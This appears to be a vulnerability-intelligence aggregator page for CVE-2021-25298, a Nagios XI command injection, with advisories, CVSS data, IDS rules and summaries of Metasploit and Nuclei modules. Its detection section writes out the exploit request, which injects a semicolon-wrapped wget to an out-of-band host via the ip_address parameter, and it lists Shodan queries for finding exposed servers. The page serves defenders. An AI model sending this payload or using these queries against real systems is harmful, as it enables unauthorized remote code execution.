CVE-2021-25298
published 2021-02-15CVE-2021-25298: Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file…
PriorityP192high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-02-01
Exploited in the wild
EPSS
75.20%
99.4th percentile
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nagios | nagios_xi | 5.5.6 – 5.7.5 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b
path/nagiosxi/config/monitoringwizard.php
commandip_address=127.0.0.1%3b%20wget%20<oast-url>%3b
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"ip_address="; content:"|3b|"; within:30; reference:cve,2021-25296; reference:cve,2021-25297; classtype:attempted-admin; sid:2034993; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296_CVE_2021_25297, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- →Exploit requests target GET /nagiosxi/config/monitoringwizard.php with parameters wizard=digitalocean (or cloud-vm/switch/windowswmi), nextstep=4, and a semicolon-encoded command injection payload (%3b) in the ip_address parameter.
- →The Emergent Threats Snort rule (sid:2034993) detects the attack by matching GET requests to nagiosxi/config/monitoringwizard.php? containing ip_address= followed by a URL-encoded semicolon (|3b|) within 30 bytes — use this pattern in NIDS/proxy logs.
- →Exploitation requires prior authentication; look for a POST to /nagiosxi/login.php followed shortly by the malicious GET to monitoringwizard.php from the same source IP.
- →The Metasploit module targets Nagios XI versions 5.5.6 to 5.7.5 across three wizards (windowswmi, switch, cloud-vm); version fingerprinting on Nagios XI instances in this range should be prioritised for patching and monitoring. ↗
- →Successful exploitation runs commands as the apache user; monitor for unexpected processes spawned by apache/httpd, especially outbound wget/curl calls. ↗
- →Shodan/FOFA exposure queries can identify internet-facing Nagios XI instances: search for title:"Nagios XI" or http.title:"nagios xi" to enumerate attack surface.
- ·The Nuclei template uses the 'digitalocean' wizard name in the exploit request, but the vulnerable file is cloud-vm.inc.php; the Metasploit module also covers 'windowswmi' and 'switch' wizards for related CVEs (CVE-2021-25296/25297). Detection rules should account for all three wizard names. ↗
- ·The Emergent Threats Snort rule (sid:2034993) references CVE-2021-25296 and CVE-2021-25297 in its metadata but the rule body also covers CVE-2021-25298 traffic patterns; ensure your NIDS signature set is updated to rev:1 or later.
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck8.8HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Nagios XI OS Command Injection
cisa·2022-01-18·CVSS 8.8
CVE-2021-25298 [HIGH] CWE-78 Nagios XI OS Command Injection
Vulnerability: Nagios XI OS Command Injection
Affected: Nagios Nagios XI
Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-25298
Remediation Due Date: 2022-02-01
GHSA
GHSA-6gq5-wx57-577c: Nagios XI version xi-5
ghsa_unreviewed·2022-05-24
CVE-2021-25298 [HIGH] CWE-78 GHSA-6gq5-wx57-577c: Nagios XI version xi-5
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.
VulnCheck
Nagios XI OS Command Injection
vulncheck·2021·CVSS 8.8
CVE-2021-25298 [HIGH] CWE-78 Nagios XI OS Command Injection
Nagios XI OS Command Injection
Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.
Affected: Nagios Nagios XI
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-february-april-2021/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2022-02-01
Suricata
ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
suricata·2025-01-09·CVSS 6.1
CVE-2021-25299 [MEDIUM] ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/nagiosxi/admin/sshterm.php?"; startswith; fast_pattern; content:"url="; nocase; pcre:"/^.+(script|onerror|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D)/Ri"; reference:url,www.connectwise.com/resources/cve-spotlight-nagios-xi-cve-2021-25296-25297-25298-25299; reference:cve,2021-25299; classtype:web-application-attack; sid:2059094; rev:2; metadata:affected_product
Suricata
ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
suricata·2022-01-27·CVSS 8.8
CVE-2021-25296 [HIGH] ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"ip_address="; content:"|3b|"; within:30; reference:cve,2021-25296; reference:cve,2021-25297; classtype:attempted-admin; sid:2034993; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296_CVE_2021_25297, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Metasploit
Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
metasploit·CVSS 8.8
CVE-2021-25296 [HIGH] Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm configuration wizards that allow an authenticated user to perform remote code execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user. Valid credentials for a Nagios XI user are required. This module has been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.
Nuclei
Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
nuclei·CVSS 8.8
CVE-2021-25298 [HIGH] Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: CVE-2021-25298
info:
name: Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
author: k0pak4
severity: high
description: |
Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. T
Unit42
Network Attack Trends: February-April 2021
blogs_unit42·2021-07-01
Network Attack Trends: February-April 2021
## Executive Summary
Unit 42 researchers observed network attack trends, February-April 2021. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity and category. Additionally, we provide insight into how the vulnerabilities are actively exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls. We then draw conclusions about the most commonly exploited vulnerabilities the attackers are using, as well as the severity, category and origin of each attack.
## Network Attack Trends February-April 2021: Analysis of the Latest Published Vulnerabilities
From February-April 2021, a total of 4,969 new Common Vulnerabilities and Exposures (CVE) numbers were registered. To better und
Unit42
Network Attack Trends: February-April 2021
blogs_unit42·2021-07-01
Network Attack Trends: February-April 2021
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: February-April 2021
Yue Guan
Lei Xu
Vaibhav Singhal
Brock Mammen
Published: July 1, 2021
Trend Reports
Vulnerabilities
Network security trends
## Executive Summary
Unit 42 researchers observed network attack trends, February-April 2021. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity and category. Additionally, we provide insight into how the vulnerabilities are actively exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls . We then draw conclusions about the most commonly exploited vulnerabilities the attackers are using, as well as the severity, category and origin of
http://nagios.comhttp://packetstormsecurity.com/files/161561/Nagios-XI-5.7.5-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.htmlhttps://assets.nagios.com/downloads/nagiosxi/versions.phphttps://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.mdhttps://www.fastly.com/blog/anatomy-of-a-command-injection-cve-2021-25296-7-8-with-metasploit-module-andhttp://nagios.comhttp://packetstormsecurity.com/files/161561/Nagios-XI-5.7.5-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.htmlhttps://assets.nagios.com/downloads/nagiosxi/versions.phphttps://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.mdhttps://www.fastly.com/blog/anatomy-of-a-command-injection-cve-2021-25296-7-8-with-metasploit-module-andhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-25298
2021-02-15
Published
2022-01-18
Added to CISA KEV
Exploited in the wild